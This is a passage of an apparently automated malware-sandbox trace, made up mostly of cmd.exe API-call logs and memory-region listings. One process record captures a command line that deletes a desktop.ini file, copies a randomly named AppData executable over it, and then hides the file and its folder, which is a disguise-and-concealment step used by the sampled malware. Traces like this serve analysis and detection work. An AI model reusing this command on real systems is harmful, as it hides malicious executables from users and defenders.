returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.858] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.858] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] GetFileType (hFile=0x4c) returned 0x1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] GetFileType (hFile=0x4c) returned 0x1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] GetFileType (hFile=0x4c) returned 0x1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] GetFileType (hFile=0x4c) returned 0x1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] GetFileType (hFile=0x4c) returned 0x1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.859] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.859] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] GetFileType (hFile=0x4c) returned 0x1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.861] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.861] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] GetFileType (hFile=0x4c) returned 0x1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] GetFileType (hFile=0x4c) returned 0x1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] GetFileType (hFile=0x4c) returned 0x1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.862] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.862] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.864] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.864] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] GetFileType (hFile=0x4c) returned 0x1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] GetFileType (hFile=0x4c) returned 0x1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] GetFileType (hFile=0x4c) returned 0x1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.865] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.865] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x32, lpOverlapped=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] GetFileType (hFile=0x4c) returned 0x1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] GetFileType (hFile=0x4c) returned 0x1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x32, lpOverlapped=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.865] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.865] _close (_FileHandle=4) returned 0 [0150.866] FindNextFileW (in: hFindFile=0x270e60, lpFindFileData=0x12f5b4 | out: lpFindFileData=0x12f5b4) returned 0 [0150.866] GetLastError () returned 0x12 [0150.866] FindClose (in: hFindFile=0x270e60 | out: hFindFile=0x270e60) returned 1 [0150.867] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0150.867] _close (_FileHandle=3) returned 0 [0150.867] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.867] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.868] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.868] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.868] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.868] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.868] SetConsoleInputExeNameW () returned 0x1 [0150.868] GetConsoleOutputCP () returned 0x1b5 [0150.868] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.868] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.868] exit (_Code=0) Process: id = "240" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xc28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19766 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19767 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19768 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19769 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 19770 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19771 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19772 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19773 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19774 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19775 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19805 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19806 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19807 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19808 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 19809 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 19810 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19811 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19812 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19813 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19814 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19815 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19816 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19817 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19818 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19819 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 19820 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 